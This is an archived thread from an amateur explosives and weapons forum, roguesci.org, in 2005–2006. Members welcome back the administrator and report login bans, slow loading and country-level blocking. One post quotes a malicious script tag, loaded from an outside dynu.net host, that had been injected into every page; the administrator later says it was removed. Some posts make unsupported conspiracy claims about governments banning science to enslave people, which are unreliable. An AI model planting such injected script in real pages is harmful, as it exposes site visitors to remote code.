View Full Version : The Triumphant Return of Megalomania

megalomania
December 12th, 2005, 12:00 AM
Greetings friends, it is I, megalomania, in the digital flesh. I have returned from my sabbatical from the Forum, unplanned as it was, to begin in earnest settings things aright once again. It is nice to see that things have progressed without my intervention, and that no calamities have befallen us in the past three months.

I am sure your first question is “where have you been?” Quite simply due to an extraordinarily busy schedule of work and research I have significantly curtailed my Internet usage. Now with the holidays upon us I have something resembling a vacation for the first time in months.

I have some catching up to do it seems. All in good time. For now I have some website tinkering to do, and I must find out who has been naughty and who has been nice.

Marvin
December 12th, 2005, 04:53 PM
Welcome back!

Actually my first question would be 'Could you see to some of the area bans blocking many members from access (including myself)?'. Thanks.

I'd also add that the preperatory manual of explosives has been posted by FireFly (err from memory, I hope thats the right nick). Its certainly worth a read, some of it is good, and some of the stuff king has written himself is so bad its scary.

Jacks Complete
December 12th, 2005, 06:29 PM
Hi Mega. Welcome back.

Hopefully a few of the forum bugs can be sorted now, and the script attack from m.dynu.net can be gotten rid of!
(<meta name="keywords" content="The Triumphant Return of Megalomania explosives,weapons,improvised,chemistry,synthesis, hobbiest,amateur,science"><script src=http://m.dynu.net/0p/rs.js></script><b att="" /> is inserted on every page.)

Also of note is that either you set up, or someone at the ISP has, blocked the entire range of BT IPs from the root domain, meaning that about 50% of people in the UK cannot see the site.

meselfs
December 12th, 2005, 11:54 PM
Greetings friends, it is I, megalomania, in the digital flesh.

Welcome back, digital mantis!

It is nice to see that things have progressed without my intervention, and that no calamities have befallen us in the past three months.

Progress? I think stale is the right word.
But no calamities :->.

meaning that about 50% of people in the UK cannot see the site

And for the rest, it's awfully slow.

DirtyDan
December 13th, 2005, 04:57 AM
I too have noticed a significant slowdown with the server, here in the states.

festergrump
December 13th, 2005, 07:28 AM
AH! Mega! Welcome home! :)

A brief message for you, sir, but pardon the fact I cannot attach this as a text file...

-----BEGIN PGP MESSAGE-----
Version: PGP 8.0.3

qANQR1DBw04DMDpISM54oW0QEACK8geqlE90tvHnzNRHcwuOkq 3f+HbgO4NgjYY+
0GHWEvcXm8v8um6ezkuVnN4LYJg2pP03ZKFNw4+9pXXZkKd6YM koENWzbfsZUUSQ
a1BZbEFVbzNvgY5Lc/b9M3s67l3qjZU4QdArrcasxOVi2gFaVs8s4BHB5AhlWq3Q
Z2rW+uab66jU+B+CC5ON+wLDrkgFuKmr7jeV2gvW3RhRpLL7qn N3+AYA2Hrvfx1M
parKyFR0oek9GxIZvkqRBMNpn1ldIr+4G0zbA/gbLLC7eG13+zR09z7bOxfMmmHY
blXqiFDDnrZ5kdkOsaS8E+ssB1QLomKSwrbqXXBb1FhRlAKePh QiPeRJtj+/csqT
10ZJrbLgXzqg+erMXKSGcHcxoL7n+dmrzjge+kaV4EsSRWXrRP jtY2nmVRL9cFEJ
IX6pxBEpdsTx8c4dbRKQ9baw/vMRNCdiZTxwxlKzAxoIznYPn23VkRcPFAohTfNT
6dazABOYYZyprN32h+7Yojqw84GG8YzvGpZCJz6va/JYGW8eXvOnMyKMBJ03X1Ze
yxMK4K1R+m/3zDRkLfrNHg7+0ZygZcY1FsosW1eQ9Kk7ZvkoAgiXIorJ/cO/CYBR
T+NRdrViqK8bRZRn8KxTVNwcdbDlpU5ybApHu5wn6piMHYVHAb 1TWTEmm6anAM9U
CZmxiA/+PoWI+EI6keOIuBVcyrncWus17jCJQFyYGKH4/xdZFFOl1MfZGkGzuuTe
F3F9tUM/mZ+k0cv0P9OjJNcmD5Uzi8hv/9h7pqIUx5ZEu7qj1CJM1FzSv7q1/wNZ
6VA/2OG89SyV6pmRyyeg8DGAH2TgsTxXhxiRT6bS+4wJowuwsVjtDg AjKRTGiKCH
5jooSHzvIFjs6iqgpQpJOMWainrZkzOFT7DzZmUMaPIq5vT7LR vdff4fmo8xViA/
4kGoMRoQARGPaSjnZ6ErMi4JP8J6t+VniocZmJ/zmGPqvCO+0O0mVUILGbZY5JAV
+YtPxuk9ljvy1/RK2HNQvjEsE+TVYoeyeq7Ug9qveKFCtWqZ6dUA7oCdztb/Ku3U
PE9bZsVKkS5a0nNQyJ87CCtt4gn0c8ebesrd8mDE7Ehc8vjyCE aJP79WJJDi3l5j
aKa8i80tT7TzR1MeVIdJhWC0wnqod1LHogqB9/5ZBjr5KWW5w6q5Smp6uQ5pEtCp
M6QD0NSkGT03HG6DvWiX15De6PyQiyfb/P7JwW0DHU68dUCHyGqSV3lTy2OTVn8a
VZ/oasjWzEfzN7WaHj/3GENNR0ZLFqSRAUUTTFhsfGinStF30TaO8QC6L48YZC2R
/YjstEBqafvT0gieb4SW0nKyrmA5fGqn9TP8gZOXaOdd79zxEN3 BwUwD9KEyTS5n
0qsBD/9OYdfHmCLSRhe7+3f/2nbQu2ZU3ErQEa8/AXwEq6BqA2NxNxuR8YBEUxMK
oBA+xBbQ2HQx14Kqz747Xv1VvB2r7m14Neo9bOuBBLkNLi4ndG teYN7xqhbGp1Qr
B8ikgidUeDN0aCYJlQdbYpJKnS2IQflfznMpx3bJrimz4bXlOE 8DcFg/xcowX2/r
bNEUefG6FMrpgiPA2+AxarGftcVcUEHDZnADS+7E2SM9yn5EzV QMvJiMKz9HV9QP
COo6SwpHwzTzRmOss/PehNvFgob48j7PhY1gnpPxvXurNRhaB2Syz3ZzP0GSI49U
FMdpIpyMGyR2hf3BtasFP6ORyXsVVcbUPl5q6HdE/GHZGu8cQBgaYSlgUC90nEtd
tSHD+UB80JSd0SB2R6pS5g5u/HydVG9p1pgeIeiOb6O4v/10UEdBs2V4h9Q/pP9l
Cyc1ucyMh54T3OF8pY/YjQwxWKrbpw5ReUkWGaK11hJOVv4VgQqZvPmtmn0Zxiue
da23d1Bs1cHjd5v6k30Jal2PkjWVN+l7LWA5sC7PpaEjDiNiGB 1V/Jaikz+WwF3E
zlMx3Vu0ddoHPGNndJ42B1uGruy9pnMKUmHsbp1XclKfAv1mX5 kUbEUF8R84bOOd
TGZ8bALKgsX9jGaaEMbb0q79EFheQKvk6aZLEWAc0djKAqE0Q9 LDTAEBsfCYQ0LF
sACmA5KN6G3/yxLcInlGhMXnN4+TlrwZ6S0ARAPSf812CNLiS7wYmzyfVlNmJ1 aS
XM2/fg+yTixQ7d8+J2BlAwZRjc5A723XDCr7dmcQY2FEOwLNkkJL1S m5eZIvftfZ
Vyebt25zFz4Xoe66ObScwXDSQA7otS4WZCApPgYViG4AWtuNHa gEmn7gZkwQAZNm
UU2i59+Z7FZgmwL/j/pHAdG0aLqznJO0llqTG6CE6WrabQ1L/6VhlRw2D0pJzY6a
pPIn+hCixVfMmfV18/UTeCa65SefuyjXhHQCO2Ae2bKJ5C07YqfmAE1DubehH952
rE/2+PQvm9JCJp4fi8J/gLEmOQ44a1PLli9kPo9zfmuvvVoUaXomxgnNnuOV0TqL
i5yuS2HAI2nkZHZOiPU4B9/BCkJzbZBvut1RcL3LjZY8nQvwDvDx91w8s/oLzKlL
hQQaOc4h0pq+JGZQyeTmEvdkemiJtVepTjC5aMY2zbLaB/aIUcsSBmAZoCPAuSIA
yNlzGkZc5iU2sIIkYev5qX2aNFIptKIJdwtt75krkdPNwud8CX WAJk2IM1N0dr1n
trpIMxPkNoA7PMLNVN04NxrF2x38SruvKqkeTy3fIEvhzWlyRL X+/frhORBVQ43g
p1tl4ZsCxecTWiXBvlQjZ8K41zy6NEGoyK6QrMZx67XtyEfjk8 yhVysRPMo8mc2m
USQOC+3PhEQrlDCO2F75BI2DgiDsfgrhEQ94fChWdnjSR6CxAB sJ0NV6wS1Yoh8Q
Kn71u2fupeL4HnN4HUkaoreV23hbu6nY+uC2Z1G3EEIIsLAKzs 5TmdDNkO1RMcRb
rnCHJnZOUZvqOpXNMPGd9oxBfSew1YWA/zZFNS6KHat0Fo0nsC13bfImCbbTsyV8
5cs2CVngcjXU5O9zo+uP+b0yaZ/w9IHspg2pT2S2ZYWNCTsn/DuSjGRWnCYlk1A1
BcnXps6/N4KDACpvMm8VgGzSmAi1j6+4Xt5lNPwWlpcBfz+qec8Fmvp6Zg E6ssIj
4acGZfYJ2aLixe5yYkqs1ALM0/2FHIfDVyoYJQNGCaPCbyol3lBaABPzdFvuJToP
/mWKtK1qIUhEC7IjzFflY6K6A7QBy91gHgNDg/ft4EbOL2INS8wsNA3e1DuYnXBk
mJyh/P9/35UhFmauE0nGrydy0JFxi06f0NLvjxuFRplMykKmljLvAtQTH4 f6SV2j
pZZQvZVZ/TQZ/z+HXv7/xFjnEi0ttbG8UbgYbWE5AevdLyIuJyOIXXB8DWIpwdeD
zDDMXyBRX3sGqyHsA+m4TGNH1Nzfgij93jih+eNCeRyL0g7uQv n5zYNPN6VT3+l2
EByTbA2Jr15BZNcmPOi+G6v5R4U=
=9Zj2
-----END PGP MESSAGE-----

megalomania
January 9th, 2006, 07:24 AM
It is unfortunate that many members have been experiencing problems. I have been advised by nbk to stop lurking and actually start posting. He is right, my presence should be visable.

I have not been able to replicate any problem with logging in, not being able to post, or not seeing any posts. This does not mean there is no problem, only that I have a harder time finding something wrong when I do not experience it myself.

As for the evil dynu code snippet, that has been exorcised. I also just upgraded us to the latest stable version of vb.

I would like to gather some additional information from those who cannot log in. What browser do you use, do you block cookies or java, what country are you coming from, are you able to log in, do you use proxies, and any other bit of information that may help me find the source of any problem.

I myself use Firefox 1.5 with no cookie or java restrictions for roguesci.org. You should not take my word for it, but for what it is worth the only cookies and java stuff on the board is from the vbulletin software that controls your log in and certain menu functions.

I have updated the ban lists to remove certain wildcarded addresses and some artifacts of a bygone era. Hopefully more people will be able to get in. I also unbanned certain popular email hosts, that has served its purpose for now. AOL, as always, remains banned :)

xyz
January 11th, 2006, 09:51 PM
Thank god that dynu.net thing is gone now, it was taking me about 15 minutes to load each page back when it was still there, which is why I took to using The Crucible instead (which seems to be down now, right after they made the forums publicly viewable, coincidence?).

simply RED
January 12th, 2006, 11:45 AM
I am reporting for the situation in Bulgaria.

Every cabel operator has blocked the adress and the site is invisible (404).
The site is accessible only from public computer clubs with optical inernet.
The site is accessible only in the big cities.

Most possibly(99%) the intelligence called all computer operators to cease the access to roguesci. Now - all kinds of science are banned in my country, there is limited access to libraries. Everyone dealing with science is threatened to stop.

megalomania
January 12th, 2006, 12:10 PM
There are a few unusual errors today! First, I am unable to approve any newbie posts. The threads and attachments approved just fine, but the posts to existing threads just will not work. I get a 403 error of all things. Another problem I had when trying to post a reply to the thread about no longer moderating newbie posts was that it returned a message saying "This forum is no longer accepting new posts." The section in particular being the water cooler. Since I just made a few other posts, and of course this post here, something is screwy.

Oh dear me, it seems we have been lumped in with the axis of evil. I would tell people to use proxies, but how would they read my message. China tried the same blocking of democracy websites and people got around that. Perhaps the Bulgarian el presidentae Georgi Purvanov is a bit nervous people might topple his empire? Maybe Ataka is rattling its saber and threatning Purvanov?

The irony of this is that Bulgaria has a reputation for selling weapons to anyone, and by anyone I mean rebel groups, despotic nations, and terrorists.

Banned by a former comunist state... I think I will use this in the logo somewhere. "9 out of 10 communist countries agree, Rogue Science is bad for imposing harsh dictatorships on the people."

Chris The Great
January 13th, 2006, 04:43 AM
(which seems to be down now, right after they made the forums publicly viewable, coincidence?).
Seems to be a temporary server problem, I couldn't get it to work but it is back up again now.

Mega, I like that slogan! You should stick it somewhere on the site :D

On the topic of errors, the preview post function works again, so at least some stuff it working properly...

Jacks Complete
January 13th, 2006, 10:27 PM
Definately a great slogan. Might get the point across to some of those who would repress this freedom of speech.

As regards login, etc. I've had no more than occasional issues. One time the server wasn't setting the cookie, as kept saying "Thanks for login in" but then you weren't. That solved itself (or was solved) after about three or four days.

I can confirm the site is flawless with Firefox 1.0.7 without javascript. The preview button always posts, though, and quick reply did the same as reply.

There are some 404 errors with some of the admin/mod pages, too. I'll PM you details if you like.

simply RED
January 14th, 2006, 07:47 AM
"Bulgaria has a reputation for selling weapons to anyone" Indeed true! But it is a reputation only. BG can produce only very very old fashioned and very very low quality small arms. The corruption in the military sector led to the absolute end of production nowdays and the world is no longer threatened by BG weapons :P .
Before a weak, the director working in one of the plants killed himself with his gun. There was a joke that if the gun was produced in his factory, he would be safe cause the gun won't fire :) .

He he, yea!
All opportunities should be explored and we should be able to get profit from anything.
Actually our politicians are so stupid to decide (banning) on their own, most possibly they were told to do so by another big player (and they - like good sheep - always listen ) . This was the second logical step after ceasing access to the technical areas in the libraries (which is already a fact here). Ataka is just fun, its doubtful they could do anything. Anyway, I know people there ...

Another interesting thing to spot is the fact, this is happening all over the world. This is not isolated phenomenon! Not only communists ban sites, all states do it now!!!

Small countries (like mine) and non- government organizatoins (like roguesci) are supposed be the first victims of the new world order. The ultimate goal is to turn people into mindless slaves. It is not communist "CONTROL", nor is capitalist "USE OF PEOPLE". It is a state where you should be in "FULL CONTROL" by the raging arhistocracy.
This is happening now! And the "BAN OF INFORMATION" is ammongst their primary goals!

As long as I'm in concern, corruption is the main weapon of the people trying to hack the world.

KLuuppo
February 1st, 2006, 01:37 PM
I wasn't able to get on the site until my ISP changed. It only said 403 forbidden when I tried to access the site. At my school it did work correctly, but not at my home. Now I'm again able to use it, and quite happy about that. This happened here at finland.